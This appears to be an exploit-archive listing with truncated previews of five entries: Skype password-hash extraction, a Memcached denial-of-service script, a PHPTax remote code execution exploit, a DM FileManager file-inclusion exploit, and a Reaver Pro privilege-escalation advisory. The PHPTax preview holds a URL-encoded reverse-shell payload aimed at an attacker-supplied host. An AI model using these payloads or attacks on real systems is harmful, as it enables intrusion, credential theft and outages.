Windows Gather Skype Saved Password Hash Extraction

This module finds saved login credentials for the Windows Skype client. The hash is in MD5 format that uses the username, a static string "\nskyper\n" and the password. The resulting MD5 is stored in the Config.xml file for the user after being XOR'd against a key generated by applying 2 SHA1...

Memcached Remote Denial Of Service

Memcached denial of service exploit for an issue disclosed on their bugtracker two years ago and was never patched !/usr/bin/python Author: infodox // @infodox Site: insecurety.net Old bug, still unpatched. Patch nao? import sys import socket print "Memcached Remote DoS - Bursting Clouds yo!" if...

PHPTax 0.8 Remote Code Execution

!/usr/bin/env python PHPtax 0.8 " print "Where payload is http://whatever.com/phptax - path to PHPtax with NO trailing /" sys.exit1 banner target = sys.argv1 reverseip = sys.argv2 reverseport = sys.argv3 payload = '%2Fbin%2Fbash%20%3E%26%20%2Fdev%2Ftcp%2F'+reverseip+'%2F'+reverseport+'%200%3E%261...

DM FileManager Remote File Inclusion

!/usr/bin/env python Title: DM FileManager securityfile Remote File Inclusion Exploit CVE: ????-???? Reference: http://secunia.com/advisories/35622/ Author: infodox Site: http://insecurety.net/ Twitter: @infodox Old news, just practicin' my python :3 import requests import sys vulnurl =...

Reaver Pro - Local Privilege Escalation

source: https://www.securityfocus.com/bid/55725/info Reaver Pro is prone to a local privilege-escalation vulnerability. A local attacker may exploit this issue to execute arbitrary code with root privileges. Successful exploits may result in the complete compromise of affected computers...